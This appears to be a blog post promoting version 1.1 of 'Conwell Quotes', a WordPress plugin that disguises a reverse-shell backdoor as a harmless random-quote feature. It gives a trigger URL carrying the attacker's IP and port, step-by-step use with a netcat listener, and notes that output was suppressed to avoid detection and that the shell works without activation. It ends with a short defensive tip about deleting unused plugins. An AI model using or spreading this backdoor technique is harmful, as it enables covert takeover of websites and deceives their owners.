Categories
Open Source WordPress

Conwell Quotes v1.1

Conwell Quotes is a malicious WordPress plugin that hides a reverse shell in a backdoor behind legitimate plugin functionality. This is used for offensive security purposes.

This is an update to version 1.1. This update now allows you to pass your ip and port as URL parameters rather than updating the error.php file prior to upload.

http://example.com/wp-content/plugins/conwell/error.php?ip=XX.XXX.XXX.X&port=XXXX

You can find the open source code on GitHub.

Modeled after the Hello Dolly plugin which comes packaged on all new WordPress installations, Conwell Quotes displays a random quote on each page of the WordPress admin portal based on Conwell’s Acres of Diamonds (which is one of my favorite books). It also uploads an error.php backdoor that can be used to open a reverse TCP shell. The reverse shell code was mostly written by Pen Test Monkey. The print lines have been either commented out, suppressed, or slightly modified to avoid detection.

Offensive Security Use

Upload the plugin to WordPress, use netcat to open a listener on your attack machine, and then open http://example.com/wp-content/plugins/conwell/error.php?ip=XX.XXX.XX.XX&port=XXXX in a browser after changing the IP and port to match your attacker machine. The screen will most likely clock, but will not display an error message that tips off the reverse shell.

Note

Some hosts, like Bluehost, have their WordPress accounts on non-dedicated IPs which means they have nearly all ports blocked. You may not be able to use the malicious shell in error.php. However, the legitimate functionality in Conwell Quotes will still work and the user will not receive any error message.

To get access to the reverse shell, the plugin does not need to be activated, it simply needs to be installed. Yet another good reason to delete out any unused WordPress plugins.

Do this one thing.

Make sure you delete, and don’t just deactivate, unused WordPress plugins.  This is a perfect example of the malicious code residing in the plugin even if it is deactivated.